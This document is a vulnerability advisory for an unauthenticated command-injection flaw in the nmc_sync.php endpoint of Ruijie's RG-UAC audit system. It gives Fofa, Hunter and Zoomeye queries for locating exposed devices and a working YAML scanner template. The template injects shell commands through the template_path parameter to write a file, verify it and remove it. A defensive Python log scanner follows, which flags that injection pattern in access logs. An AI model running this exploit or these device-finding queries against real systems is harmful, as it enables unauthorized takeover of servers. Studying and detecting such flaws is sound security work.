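Vulnerability description
The nmc_sync.php endpoint of the Ruijie RG-UAC Unified Internet Behavior Management and Audit System has a command execution vulnerability. An unauthenticated attacker can execute arbitrary commands and take control of the server.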
Fofa: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac"
Hunter: app.name="Ruijie 锐捷 RG-UAC"
Zoomeye: app:"锐捷RG-UAC统一上网行为管理审计系统"
id: ruijie-rg-uac-nmc-sync-rce

info:
  name: 锐捷RG-UAC nmc_sync.php存在RCE漏洞
  author: Y3y1ng
  severity: critical
  verified: true
  description: |-
    锐捷RG-UAC统一上网行为管理审计系统 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。
    Fofa: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac"
    Hunter: app.name="Ruijie 锐捷 RG-UAC"
    Zoomeye: app:"锐捷RG-UAC统一上网行为管理审计系统"
  reference:
    - https://mp.weixin.qq.com/s/_IPk892U5q5ctVqehCoGig
    - https://github.com/xinyisleep/pocscan/blob/ee0c74e68ec95b82a4e4ebcdb961d6ed18a44b77/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py
  tags: ruijie,rce
  created: 2023/12/10

set:
  r1: randomLowercase(4)
  md5: md5(r1)

rules:
  r0:
    request:
      method: GET
      path: /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|echo {{md5}} > {{r1}}.txt|cat
    expression: |
      response.status == 200
  r1:
    request:
      before_sleep: 1
      method: GET
      path: /view/systemConfig/management/{{r1}}.txt
    expression: |
      response.status == 200 &&
      response.body.bcontains(bytes(md5))
  r2:
    request:
      before_sleep: 1
      method: GET
      path: /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|rm {{r1}}.txt|cat
    expression: |
      response.status == 200

expression: r0() && r1() && r2()
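
A defender-side check for the requests this template sends, as an added example that is not part of the original PoC or of any Ruijie tooling: it scans web access logs for shell metacharacters in the nmc_sync.php parameters and for the follow-up fetch of a four-letter .txt file in the same directory. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote
# Endpoint and parameter names come from the PoC on this page.
ENDPOINT = "/view/systemConfig/management/nmc_sync.php"
PARAMS = {"center_ip", "template_path"}
# Characters that let a shell chain commands or redirect output.
SHELL_META = re.compile(r"[|;&`$<>\r\n]")
# The template verifies by fetching a 4-lowercase-letter .txt file it created.
MARKER_FILE = re.compile(r"^/view/systemConfig/management/[a-z]{4}\.txt$")
# Assumption: access logs use the common/combined format ("METHOD target HTTP/x").
REQUEST = re.compile(r'"[A-Z]+ (?P<target>.+) HTTP/[\d.]+"')


def classify(target):
    """Return (reason, detail) for a request target, or None if it looks benign."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if MARKER_FILE.match(path):
        return ("marker-file-fetch", path)
    if path != ENDPOINT:
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # Decode a second time so double-encoded payloads (%257C) are also seen.
        if name in PARAMS and SHELL_META.search(unquote(value)):
            return ("shell-metachar-in-" + name, value)
    return None


def scan(lines):
    """Return (line_number, reason, detail) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        verdict = classify(match.group("target")) if match else None
        if verdict:
            hits.append((number, *verdict))
    return hits


# Constructed sample log lines (documentation IP range, harmless marker text).
SAMPLE_LOG = [
    '192.0.2.7 - - [10/Dec/2023:10:00:01 +0800] "GET /view/systemConfig/management/nmc_sync.php?center_ip=10.1.1.5&template_path=/tmp/tpl HTTP/1.1" 200 0',
    '192.0.2.9 - - [10/Dec/2023:10:00:02 +0800] "GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=%7Cecho%20marker%20%3E%20abcd.txt%7Ccat HTTP/1.1" 200 0',
    '192.0.2.9 - - [10/Dec/2023:10:00:03 +0800] "GET /view/systemConfig/management/abcd.txt HTTP/1.1" 200 33',
    '192.0.2.8 - - [10/Dec/2023:10:00:04 +0800] "GET /index.php?q=a%7Cb HTTP/1.1" 200 512',
]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The marker-file rule is a heuristic tied to this template's four-letter file name, so treat a hit as a lead to correlate with a preceding nmc_sync.php request from the same source rather than as proof on its own.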